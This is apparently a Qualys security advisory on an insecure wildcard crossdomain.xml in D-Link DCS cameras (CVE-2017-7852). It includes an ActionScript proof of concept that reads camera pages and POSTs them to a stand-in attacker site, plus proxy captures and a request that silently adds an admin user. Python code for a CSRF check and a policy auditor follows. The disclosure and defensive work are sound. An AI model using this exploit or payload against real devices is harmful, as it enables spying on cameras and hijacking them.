Qualys Security Advisory QSA-2017-02-22 


February 22, 2017 


Insecure CrossDomain.XML in D-Link DCS Series Cameras 


SYNOPSIS: 


D-Link DCS series network cameras ship a weak/insecure crossdomain.xml file which allows sites hosting a 
malicious Flash object to access and/or change the device's settings. 


Reference: http://us.dlink.com/product-category/home-solutions/view/network-cameras 


CVE: CVE-2017-7852 (http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7852) 


Vendor Response: In 2016 we phased in CSRF mitigation on all CGI on the cameras so an injection like 
this would not be allowed authenticated or unauthenticated. 


Please refer to the tracking table at the bottom of this report which includes the H/W Revision and 
firmware when this CSRF mitigation was enabled. 


VULNERABILITY DETAILS: 
Lab Setup: 


Target Camera: DCS-933L with firmware version 1.03 

Target IP Address: 10X.X.X.X 

Site Hosting Malicious Flash Object: http://Maliciousxxxx.com 
Camera settings sent to: http://MyMaliciousSite.com 




Vulnerable/Tested Version: 


DCS-933L running firmware version 1.03 is affected. However, the latest firmware for this device, as well as 
for other devices such as the DCS-5030L, DCS-5020L, DCS-2530L, DCS-2630L, DCS-930L, DCS-932L, 
DCS-932LB1 etc., contains the same file with the same weak or improper configuration. 


[Screenshot: extracted firmware image _DCS-933L_v1.13.05.bin.extracted > _50040.extracted > _3B0000.extracted > cpio-root > etc_ro > web. 
The web root contains account.htm, advanced.htm, aplist.htm, audio.htm, aview.htm, bootver.htm, clients.htm, ... and crossdomain.xml (XML Document, 1 KB).] 


Contents of crossdomain.xml: 

    <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"> 
    <cross-domain-policy> 
    <allow-access-from domain="*" secure="true" /> 
    </cross-domain-policy> 


All domains are allowed to access objects from this device. 


Note: It seems that all DCS series network cameras have the same file containing the same weak or improper configuration, 
but I haven't checked it on all models. 


Vulnerability: Insecure CrossDomain.XML file vulnerability 


An unauthenticated, remote attacker could host a malicious Flash file on a website of their own that makes requests to 
the victim's device without having the device credentials. 


Risk Factor: High 


Impact: 


If a victim is logged in to the camera's web console and, from another tab in the same browser, visits a malicious 
site hosting a malicious Flash file, that Flash file can send requests to the victim's DCS series camera without 
knowing the credentials: the browser attaches the cached HTTP Basic credentials to every request to the camera, and 
the camera's wildcard crossdomain.xml lets Flash Player read the responses. 


An attacker can host a malicious Flash file which retrieves live feeds or other information from the victim's DCS 
series camera, adds new admin users or makes other changes to the device. 


CVSS Score: AV:N/AC:L/Au:N/C:C/I:N/A:C 


Proof-Of-Concept: 


1. Build a Flash file using the Flex SDK which accesses advanced.htm on the target device and sends the 
response to the attacker's site. 


The Flash file was built in FlashDevelop (project Test4, compiled with the Flex SDK via fdbuild.exe). The 
ActionScript source, FlashTest.as: 

    package { 
        import flash.display.Sprite; 
        import flash.events.*; 
        import flash.net.URLRequestMethod; 
        import flash.net.URLRequest; 
        import flash.net.URLLoader; 

        public class FlashTest extends Sprite { 

            public function FlashTest() { 
                // Target device: the camera page to read (IP redacted, see Lab Setup) 
                var readFrom:String = "http://10X.X.X.X:82/advanced.htm"; 
                var readRequest:URLRequest = new URLRequest(readFrom); 
                var getLoader:URLLoader = new URLLoader(); 
                // eventHandler runs once the camera's response has arrived 
                getLoader.addEventListener(Event.COMPLETE, eventHandler); 
                try { 
                    // Flash Player first fetches http://10X.X.X.X:82/crossdomain.xml; 
                    // since it allows domain="*", the cross-domain read is permitted and 
                    // the browser attaches the victim's cached Basic credentials 
                    getLoader.load(readRequest); 
                } 
                catch (error:Error) { 
                } 
            } 

            private function eventHandler(event:Event):void { 
                // Attacker's site: where the camera's response is sent 
                var sendTo:String = "http://mymalicioussite.com/"; 
                var sendRequest:URLRequest = new URLRequest(sendTo); 
                sendRequest.method = URLRequestMethod.POST; 
                sendRequest.data = event.target.data;   // body of advanced.htm 
                var sendLoader:URLLoader = new URLLoader(); 
                try { 
                    sendLoader.load(sendRequest); 
                } 
                catch (error:Error) { 
                } 
            } 
        } 
    } 


2. Download this file and copy it to the WebRoot of http://Maliciousxxxx.com 


    root@kali:/var/www/html# ls -liah FlashMe2.swf 
    1710178 -rwxrwxrwx 1 root root 6.0K Feb 23 2017 FlashMe2.swf 
    root@kali:/var/www/html# 


3. Log into the Camera’s web admin console and then visit http://Maliciousxxxx.com/FlashMe2.swf 




Response to the above request (proxy history; the victim's browser is proxied through Burp, listener port 8080): 

    #50  GET   http://10X.X.X.X:82/                                 200  HTML 
    #51  GET   http://10X.X.X.X:82/function.js?cidx=1.032014-02-11   200  script 
    #52  GET   http://10X.X.X.X:82/hview.htm                         200  HTML    D-Link Corporation. | ... 
    #55  GET   http://10X.X.X.X:82/function.js?cidx=1.032014-02-11   200  script 
    #56  GET   http://10X.X.X.X:82/hjcheck.htm                       200  HTML    D-Link Corporation. | ... 
    #59  GET   http://10X.X.X.X:82/function.js?cidx=1.032014-02-11   200  script 
    #60  GET   http://10X.X.X.X:82/deployJava.js?cidx=1.032014-0...  200  script 
    #67  GET   http://10X.X.X.X:82/crossdomain.xml                   200  XML 
    #68  GET   http://10X.X.X.X:82/advanced.htm                      200  HTML    D-Link Corporation. | ... 
    #69  GET   http://mymalicioussite.com/crossdomain.xml            200  XML 
    #70  POST  http://mymalicioussite.com/                           200  HTML    Apache2 Debian Def... 
Response for FlashMe2.swf, served from the attacker's site: 

    HTTP/1.1 200 OK 
    Date: Thu, 23 Feb 2017 05:43:33 GMT 
    Server: Apache/2.4.23 (Debian) 
    Last-Modified: Thu, 23 Feb 2017 05:43:33 GMT 
    ETag: W/"1717-5492efd077180" 
    Accept-Ranges: bytes 
    Content-Length: 6135 
    Connection: close 
    Content-Type: application/x-shockwave-flash 
The Flash object fetched above then sends a GET request to http://CameraIP/advanced.htm. 


Proxy history once the victim visits FlashMe2.swf: 

    GET   http://Maliciousxxxx.com/FlashMe2.swf        200  flash   <-- victim visits FlashMe2.swf 
    GET   http://10X.X.X.X:82/crossdomain.xml          200  XML     <-- victim's browser reads permissions from the target device 
    GET   http://10X.X.X.X:82/advanced.htm             200  HTML    <-- victim's browser reads advanced.htm from the target device 
    GET   http://mymalicioussite.com/crossdomain.xml   200  XML     <-- victim's browser reads permissions from the attacker's site 
    POST  http://mymalicioussite.com/                  200  HTML    <-- victim's browser posts the response from the target device to the attacker's site 

Request sent to the camera (note the Referer and the cached Basic credentials): 
    GET /advanced.htm HTTP/1.1 
    Host: 10X.X.X.X:82 
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
    Accept-Language: en-US,en;q=0.5 
    Accept-Encoding: gzip, deflate 
    Referer: http://Maliciousxxxx.com/FlashMe2.swf        <-- Referred by the attacker's site 
    Authorization: Basic YWRtaW4[...] 
    Connection: close 


Response to this request, from the camera (proxy history entry #68): 

    HTTP/1.0 200 OK 
    Server: alphapd 
    Date: Sun Feb 9 00:29:33 2014 
    Pragma: no-cache 
    Cache-Control: no-cache 
    Content-type: text/html 

    <html> 
    <head> 
    <link rel="stylesheet" rev="stylesheet" href="dlink.css?cidx=1.032014-02-11" type="text/css"> 
    <title>D-Link Corporation. | WIRELESS INTERNET CAMERA | MAINTENANCE | DEVICE MANAGEMENT</title> 
    <meta http-equiv="X-UA-Compatible" content="requiresActiveX=true"> 
    <meta content="text/html; charset=windows-1252" http-equiv=Content-Type> 
    <meta HTTP-EQUIV="Pragma" CONTENT="no-cache"> 
    <meta HTTP-EQUIV="Expires" CONTENT="-1"> 
    <script language="Javascript" SRC="function.js?cidx=1.032014-02-11"></script> 
    <script language="Javascript"> 
    function InitAUTO() 
    { 
        frm = document.forms[1]; 
        frm.OSDColorSel.value = frm.OSDColorY.value+","+frm.OSDColorU.value+","+frm.OSDColorV.value; 
        clickCheck(); 
    } 
    function clickCheck() 
    { 
        frm = document.forms[1]; 
        if (frm.OSDEnable[0].checked) 
            frm.OSDColorSel.disabled = false; 
        else 
    [...] 


The Flash object then sends the above response, which it received from the camera, to the attacker's site 
(proxy history entry #70, POST to http://mymalicioussite.com/): 

    POST / HTTP/1.1 
    Host: mymalicioussite.com                               <-- Sensitive information being sent to an attacker-controlled site 
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
    Accept-Language: en-US,en;q=0.5 
    Accept-Encoding: gzip, deflate 
    Connection: close 
    Referer: http://Maliciousxxxx.com/FlashMe2.swf          <-- Referred by an attacker-controlled malicious site 
    Content-type: application/x-www-form-urlencoded 
    Content-Length: 13795 

    <html> 
    <head> 
    <link rel="stylesheet" rev="stylesheet" href="dlink.css?cidx=1.032014-02-11" type="text/css"> 
    <title>D-Link Corporation. | WIRELESS INTERNET CAMERA | MAINTENANCE | DEVICE MANAGEMENT</title> 
    [... the rest of the advanced.htm page body received from the camera, as shown above ...] 


In this way I could request other pages and retrieve sensitive information from the device, such as the live video 
feed. I could even add an admin user to the device; the following screenshots show this. I used 
a publicly available crossdomain.xml hacking proof-of-concept tool to do so. 


1. The following screenshot shows that there are no other users on the device at the moment: 

[Screenshot: the camera's Admin page (advanced.htm). It offers ADMIN PASSWORD SETTING (Old Password, New Password, 
Retype Password), SERVER SETTING (Camera Name DCS-933L, LED Control Normal/Off, User Access Control Enable/Disable, 
Snapshot URL Authentication Enable/Disable for http://192.168.0.30:82/image/jpeg.cgi, OSD Time Enable/Disable, Color Red), 
ADD USER ACCOUNT (User Name, Password, Retype Password) and a USER LIST (no., name), which is empty.] 


2. Request to add user admin1, sent with the crossdomain.xml PoC Tool by mandatory 
(https://thehackerblog.com/crossdomain/index.html): 

    Target URL:      http://10X.X.X.X:82/setSystemAddUser 
    Method:          POST 
    Request Headers: (custom headers are only allowed for POST requests) 
    Request Data:    Content-Length: 121 
                     ReplySuccessPage=advanced.htm&ReplyErrorPage=errradv.htm&UserName=admin1&UserPassword=admin&ChkPassword=admin&UserAdd=Add 

    Response clipboard: ioErrorHandler: [IOErrorEvent type="ioError" bubbles=false cancelable=false 
    eventPhase=2 text="Error #2032"] 


3. User admin1 added successfully: 

[Screenshot: the same Admin page (http://10X.X.X.X:82/advanced.htm) after the request; the USER LIST now 
contains the user admin1 with modify/delete controls.] 
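The vendor response above says the fix was CSRF mitigation on all CGI handlers, and the captured request shows why that works here: the request the victim's browser sends on behalf of the SWF carries the victim's cached Basic credentials, but its Referer is the SWF's URL on the attacker's site, and the form body contains nothing that only the camera's own page could have supplied. The following Python is an added illustration, not D-Link's firmware code, of a server-side check of that kind applied to /setSystemAddUser. The function names, the HMAC token scheme and the sample requests (built from the capture above, with the redacted values kept as placeholders) are my own constructions.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Placeholder device address, as redacted in the Lab Setup above.
DEVICE_HOST = "10X.X.X.X:82"

# Constructed from the capture in this advisory: what the victim's browser sent
# for FlashMe2.swf. The browser, not the SWF, sets Referer to the SWF's URL.
FLASH_POC_HEADERS = {
    "Host": DEVICE_HOST,
    "Referer": "http://Maliciousxxxx.com/FlashMe2.swf",
    "Authorization": "Basic YWRtaW4[...]",   # placeholder, redacted in the capture
    "Content-type": "application/x-www-form-urlencoded",
}
# Constructed: the same form submitted from the camera's own Admin page.
SAME_ORIGIN_HEADERS = {
    "Host": DEVICE_HOST,
    "Referer": "http://%s/advanced.htm" % DEVICE_HOST,
    "Authorization": "Basic YWRtaW4[...]",
    "Content-type": "application/x-www-form-urlencoded",
}
ADD_USER_BODY = ("ReplySuccessPage=advanced.htm&ReplyErrorPage=errradv.htm"
                 "&UserName=admin1&UserPassword=admin&ChkPassword=admin&UserAdd=Add")


def request_is_same_site(headers, device_host):
    """Origin/Referer check. Origin is preferred when present; Referer is what
    the captured request carries. A request with neither header is treated as
    cross-site here; because browsers and proxies sometimes strip Referer, the
    token check below, not this one, is the primary control."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False
    return urlsplit(src).netloc.lower() == device_host.lower()


# Assumption: a per-boot device secret that never leaves the device.
_DEVICE_SECRET = secrets.token_bytes(32)


def issue_csrf_token(principal):
    """Token bound to the authenticated principal (the Basic-auth user). The
    Admin page would embed it in the form as a hidden field; an SWF on another
    site cannot read that page, so it cannot obtain the token."""
    return hmac.new(_DEVICE_SECRET, principal.encode(), hashlib.sha256).hexdigest()


def csrf_token_valid(principal, token):
    return bool(token) and hmac.compare_digest(issue_csrf_token(principal), token)


def handle_set_system_add_user(headers, body, principal):
    """Decision for POST /setSystemAddUser. Returns (status, reason)."""
    if not request_is_same_site(headers, DEVICE_HOST):
        return 403, "cross-site request: Referer/Origin is not the device"
    params = parse_qs(body)
    token = params.get("csrf_token", [None])[0]
    if not csrf_token_valid(principal, token):
        return 403, "missing or invalid CSRF token"
    return 200, "user %s added" % params["UserName"][0]


def demo():
    """Three cases: the Flash PoC request, a same-origin post without a token,
    and a same-origin post carrying a valid token. Returns their status codes."""
    poc = handle_set_system_add_user(FLASH_POC_HEADERS, ADD_USER_BODY, "admin")[0]
    no_token = handle_set_system_add_user(SAME_ORIGIN_HEADERS, ADD_USER_BODY, "admin")[0]
    legit_body = ADD_USER_BODY + "&csrf_token=" + issue_csrf_token("admin")
    legit = handle_set_system_add_user(SAME_ORIGIN_HEADERS, legit_body, "admin")[0]
    return poc, no_token, legit


if __name__ == "__main__":
    print(demo())   # (403, 403, 200)
```

The Referer comparison alone would already stop the request captured in this advisory, since Flash cannot override the Referer the browser attaches; the token is what keeps the protection intact when a client omits Referer, and binding it to the principal means a token issued to one account is useless for another.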


Tracking Table: 

[Table of H/W revisions and firmware versions in which the CSRF mitigation was enabled; not legible in this copy of the advisory.] 


Potential Mitigation per CWE: 


Avoid using wildcards in the cross-domain policy file. Any domain matching the wildcard expression will be 
implicitly trusted, and can perform two-way interaction with the target server. 


For Flash, modify crossdomain.xml to use meta-policy options such as 'master-only' or 'none' to reduce the 
possibility of an attacker planting extraneous cross-domain policy files on a server. 


Adobe Recommendation: http://www.adobe.com/devnet/flashplayer/articles/cross_domain_policy.html 
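To make the policy-file weakness described in the Vulnerability Details concrete, and to show what the CWE mitigation above changes, here is an added Python example (not from the advisory, not D-Link's code) that parses a crossdomain.xml the way an audit would, models Flash Player's domain-matching decision for a given SWF origin, and lists the findings. WEAK_POLICY is the file recovered from the DCS-933L firmware; HARDENED_POLICY is my constructed counterpart following the guidance (no wildcard, explicit meta-policy), with viewer.example.com as a placeholder for the one site that legitimately needs Flash access. Function names are mine.

```python
import xml.etree.ElementTree as ET

# The policy recovered from the DCS-933L firmware (etc_ro/web/crossdomain.xml).
WEAK_POLICY = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="true" />
</cross-domain-policy>"""

# Constructed hardened policy: explicit meta-policy, one named domain, no wildcard.
HARDENED_POLICY = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only" />
<allow-access-from domain="viewer.example.com" secure="true" />
</cross-domain-policy>"""


def parse_policy(xml_text):
    """Extract the parts of a policy file that matter for an audit."""
    root = ET.fromstring(xml_text)   # the external DTD reference is not fetched
    if root.tag != "cross-domain-policy":
        raise ValueError("not a cross-domain policy: <%s>" % root.tag)
    site_control = root.find("site-control")
    return {
        "meta_policy": (site_control.get("permitted-cross-domain-policies")
                        if site_control is not None else None),
        # secure defaults to true; only an explicit secure="false" turns it off
        "allow": [(e.get("domain", ""), e.get("secure", "true").lower() != "false")
                  for e in root.findall("allow-access-from")],
        "headers": [(e.get("domain", ""), e.get("headers", ""))
                    for e in root.findall("allow-http-request-headers-from")],
    }


def domain_matches(pattern, host):
    """Flash Player matching: '*' matches every host, '*.example.com' matches
    example.com and its subdomains, anything else must match exactly."""
    pattern, host = pattern.lower(), host.lower()
    if pattern == "*":
        return True
    if pattern.startswith("*."):
        base = pattern[2:]
        return host == base or host.endswith("." + base)
    return host == pattern


def swf_allowed(policy, swf_host, swf_scheme="http", policy_scheme="http"):
    """Would Flash Player let an SWF from swf_scheme://swf_host read responses
    from the host that served this policy over policy_scheme?"""
    for pattern, secure in policy["allow"]:
        # secure="true" only has an effect on a policy served over HTTPS, where
        # it refuses HTTP-hosted SWFs. Over plain HTTP, the camera's case, the
        # attribute is inert, so it does not narrow the wildcard at all.
        if policy_scheme == "https" and secure and swf_scheme != "https":
            continue
        if domain_matches(pattern, swf_host):
            return True
    return False


def audit_policy(policy):
    """Return a list of findings; an empty list means nothing was flagged."""
    findings = []
    if policy["meta_policy"] is None:
        findings.append("no <site-control>: state permitted-cross-domain-policies "
                        "explicitly (master-only or none)")
    for pattern, _ in policy["allow"]:
        if pattern == "*":
            findings.append('allow-access-from domain="*": any site\'s SWF can '
                            "read authenticated responses from this host")
        elif "*" in pattern:
            findings.append("partial wildcard %r: every matching host is trusted" % pattern)
    for pattern, headers in policy["headers"]:
        if pattern == "*" or headers.strip() == "*":
            findings.append("allow-http-request-headers-from %r headers=%r is too broad"
                            % (pattern, headers))
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        pol = parse_policy(text)
        print(name, "- Maliciousxxxx.com allowed:", swf_allowed(pol, "maliciousxxxx.com"))
        for finding in audit_policy(pol):
            print("   -", finding)
```

Run against the two policies, the weak one lets an SWF from Maliciousxxxx.com read the camera's responses and produces two findings (wildcard domain, no meta-policy); the hardened one admits only viewer.example.com and produces none. The secure="true" in the camera's file is worth noting: it looks like a restriction, but the check in swf_allowed shows it never applies to a policy served over HTTP.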


CREDITS: 


The discovery and documentation of this vulnerability was conducted by Kapil Khot, Qualys 
Vulnerability Signature/Research Team. 


CONTACT: 


For more information about the Qualys Security Research Team, visit our website at 
http://www.qualys.com or send email to research @ qualys.com 


LEGAL NOTICE: 


The information contained within this advisory is Copyright (C) 2017 Qualys Inc. It may be redistributed 
provided that no fee is charged for distribution and that the advisory is not modified in any way. 


